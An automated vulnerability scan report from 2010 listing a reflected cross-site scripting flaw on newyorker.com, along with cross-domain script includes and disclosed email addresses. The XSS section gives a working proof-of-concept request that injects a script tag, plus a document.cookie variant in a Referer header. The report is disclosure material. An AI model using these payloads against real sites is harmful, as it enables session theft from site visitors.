newyorker.com | CWE-79 | XSS | Hoyt LLC Research

Loading

Cross Site Scripting, XSS, Vulnerability Crawler

Report generated by XSS.CX at Thu Dec 09 21:30:39 CST 2010.


Contents

1. Cross-site scripting (reflected)

2. Cross-domain script include

3. Email addresses disclosed

3.1. http://www.newyorker.com/arts/critics/musical/2010/08/16/100816crmu_music_frerejones

3.2. http://www.newyorker.com/js/pluck.min.js



1. Cross-site scripting (reflected)  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newyorker.com
Path:   /arts/critics/musical/2010/08/16/100816crmu_music_frerejones

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b76ee"><script>alert(1)</script>f60fc756635 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

Request

GET /arts/critics/musical/2010/08/16/100816crmu_music_frerejones?b76ee"><script>alert(1)</script>f60fc756635=1 HTTP/1.1
Host: www.newyorker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Resin/3.1.6
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private, max-age=600
Expires: Fri, 10 Dec 2010 02:39:03 GMT
Date: Fri, 10 Dec 2010 02:29:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 92345


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<a href="http://twitter.com/share" class="twitter-share-button" data-url="http://www.newyorker.com/arts/critics/musical/2010/08/16/100816crmu_music_frerejones?b76ee"><script>alert(1)</script>f60fc756635=1" data-counturl="http://www.newyorker.com/arts/critics/musical/2010/08/16/100816crmu_music_frerejones?b76ee">
...[SNIP]...

2. Cross-domain script include  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newyorker.com
Path:   /arts/critics/musical/2010/08/16/100816crmu_music_frerejones

Issue detail

The response dynamically includes the following scripts from other domains:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

Request

GET /arts/critics/musical/2010/08/16/100816crmu_music_frerejones HTTP/1.1
Host: www.newyorker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Resin/3.1.6
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private, max-age=495
Expires: Fri, 10 Dec 2010 02:37:13 GMT
Date: Fri, 10 Dec 2010 02:28:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 92139


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<link rel="stylesheet" type="text/css" media="screen" href="/css/features.css" />

<script type="text/javascript" src="http://www.google.com/jsapi?key=ABQIAAAAonqrKszikW5QtFiH4-iCyRT0-5yCnJDs6iqFkVKBoRnE1chVBBRKDMtdGJ58G93312zca-4xbiLVGQ"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://tcr.tynt.com/javascripts/Tracer.js?user=cT9yCKGeer3PWlab7jrHtB&amp;s=62"></script>
...[SNIP]...

3. Email addresses disclosed  previous
There are 2 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


3.1. http://www.newyorker.com/arts/critics/musical/2010/08/16/100816crmu_music_frerejones  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newyorker.com
Path:   /arts/critics/musical/2010/08/16/100816crmu_music_frerejones

Issue detail

The following email address was disclosed in the response:

Request

GET /arts/critics/musical/2010/08/16/100816crmu_music_frerejones HTTP/1.1
Host: www.newyorker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Resin/3.1.6
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private, max-age=495
Expires: Fri, 10 Dec 2010 02:37:13 GMT
Date: Fri, 10 Dec 2010 02:28:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 92139


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<a href="mailto:permissions@condenast.com">
...[SNIP]...

3.2. http://www.newyorker.com/js/pluck.min.js  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newyorker.com
Path:   /js/pluck.min.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/pluck.min.js HTTP/1.1
Host: www.newyorker.com
Proxy-Connection: keep-alive
Referer: http://www.newyorker.com/arts/critics/musical/2010/08/16/100816crmu_music_frerejones?b76ee%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef60fc756635=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8e-fips-rhel5
Last-Modified: Fri, 03 Dec 2010 20:44:06 GMT
ETag: "2c69d4-1345c-49687997db5a7"-gzip
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: application/javascript
Cache-Control: max-age=600
Expires: Fri, 10 Dec 2010 03:37:29 GMT
Date: Fri, 10 Dec 2010 03:27:29 GMT
Connection: close
Content-Length: 78940

if(typeof YAHOO=="undefined"||!YAHOO){var YAHOO={}}YAHOO.namespace=function(){var b=arguments,g=null,e,c,f;for(e=0;e<b.length;e=e+1){f=b[e].split(".");g=YAHOO;for(c=(f[0]=="YAHOO")?1:0;c<f.length;c=c+
...[SNIP]...
=this;me.serverUrl={};me.photoUrl={};me.siteUrl={};me.loggedIn=LoggedIn();me.domain=setDomain();me.gatewayHandler=new RegisteredGateway("/user/login","/user/registration");me.out={};me.communityAdmin="community@self.com";me.mostpopularEntries=10;me.mostpopularAge=15;var jQDetected=(typeof window.jQuery=="undefined"?false:true);var permissionTiers={};permissionTiers.Editor=4;permissionTiers.GroupAdmin=3;permissionTier
...[SNIP]...

Report generated by XSS.CX at Thu Dec 09 21:30:39 CST 2010.